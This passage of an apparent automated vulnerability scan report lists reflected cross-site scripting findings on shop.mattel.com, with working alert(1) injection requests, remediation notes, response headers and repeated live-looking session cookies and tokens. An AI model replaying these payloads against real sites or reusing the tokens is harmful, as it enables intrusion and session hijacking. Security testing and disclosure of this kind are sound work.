st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.23. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d072a"-alert(1)-"13ed71b93db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /giftCertificates/index.jsp?d072a"-alert(1)-"13ed71b93db=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:46 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.24. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7abdc--><script>alert(1)</script>ca2770aa469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /giftCertificates/index.jsp?7abdc--><script>alert(1)</script>ca2770aa469=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:52 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43591
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the display request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11184"-alert(1)-"137cfc99da6 was submitted in the display parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp?display=store11184"-alert(1)-"137cfc99da6&subdisplay=contact HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:40 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the display request parameter is copied into an HTML comment. The payload ae7c4--><script>alert(1)</script>8529c1ade60 was submitted in the display parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp?display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:41 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50952
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <!-- === Request Query String: display=storeae7c4--><script>alert(1)</script>8529c1ade60&subdisplay=contact --> ...[SNIP]...
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f74"-alert(1)-"bafccbb8a5f was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store47f74"-alert(1)-"bafccbb8a5f&subdisplay=contact HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:38 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... = {}; }
The value of the jsessionid request parameter is copied into an HTML comment. The payload 58f03--><script>alert(1)</script>ff989ba6b7c was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:39 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51104
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&display=store58f03--><script>alert(1)</script>ff989ba6b7c&subdisplay=contact --> ...[SNIP]...
1.29. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/helpdesk/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b7d"-alert(1)-"374d85b5440 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp?a6b7d"-alert(1)-"374d85b5440=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:36 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.30. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/helpdesk/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 682a0--><script>alert(1)</script>d018437814a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp?682a0--><script>alert(1)</script>d018437814a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:37 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 50892
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <!-- === Request Query String: 682a0--><script>alert(1)</script>d018437814a=1 --> ...[SNIP]...
The value of the stillHaveQuestion request parameter is copied into an HTML comment. The payload 900f6--><script>alert(1)</script>fcf53bf03ee was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes900f6--><script>alert(1)</script>fcf53bf03ee HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41092
The value of the stillHaveQuestion request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33980"-alert(1)-"a02d5e30f09 was submitted in the stillHaveQuestion parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact&stillHaveQuestion=yes33980"-alert(1)-"a02d5e30f09 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:48 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 41060
The value of the subdisplay request parameter is copied into an HTML comment. The payload 3f282--><script>alert(1)</script>79695b33cda was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact3f282--><script>alert(1)</script>79695b33cda HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:45 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40113
The value of the subdisplay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 783bb"-alert(1)-"a156f112195 was submitted in the subdisplay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /helpdesk/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?display=store&subdisplay=contact783bb"-alert(1)-"a156f112195 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
